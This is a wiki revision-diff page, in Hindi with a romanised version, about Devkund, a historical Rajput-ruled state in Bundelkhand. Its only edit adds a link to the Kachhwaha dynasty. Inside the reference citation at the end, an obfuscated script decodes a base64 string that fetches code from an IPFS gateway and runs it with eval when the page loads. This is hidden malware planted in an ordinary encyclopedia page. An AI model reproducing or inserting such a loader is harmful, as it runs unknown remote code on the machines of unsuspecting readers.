Difference between revisions of "देवकुण्ड (बुंदेलखंड)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''देवकुण्ड''' बुंदेलखंड, मध्य प्रदेश का एक ऐतिहासि...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
 
'''देवकुण्ड''' [[बुंदेलखंड]], [[मध्य प्रदेश]] का एक ऐतिहासिक राज्य था।
 
'''देवकुण्ड''' [[बुंदेलखंड]], [[मध्य प्रदेश]] का एक ऐतिहासिक राज्य था।
  
*पूर्व मध्य काल में देवकुण्ड में कछवाहा [[राजपूत|राजपूतों]] की एक शाखा का राज्य था।
+
*पूर्व मध्य काल में देवकुण्ड में [[कछवाहा वंश|कछवाहा]] [[राजपूत|राजपूतों]] की एक शाखा का राज्य था।
 
*इन राजपूतों की बनायी इमारतों के [[अवशेष]] यहाँ खंडहरों के रूप में स्थित है।
 
*इन राजपूतों की बनायी इमारतों के [[अवशेष]] यहाँ खंडहरों के रूप में स्थित है।
  

Latest revision as of 13:21, 8 June 2014

devakund buandelakhand, madhy pradesh ka ek aitihasik rajy tha.

  • poorv madhy kal mean devakund mean kachhavaha rajapootoan ki ek shakha ka rajy tha.
  • in rajapootoan ki banayi imaratoan ke avashesh yahaan khandaharoan ke roop mean sthit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 441 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh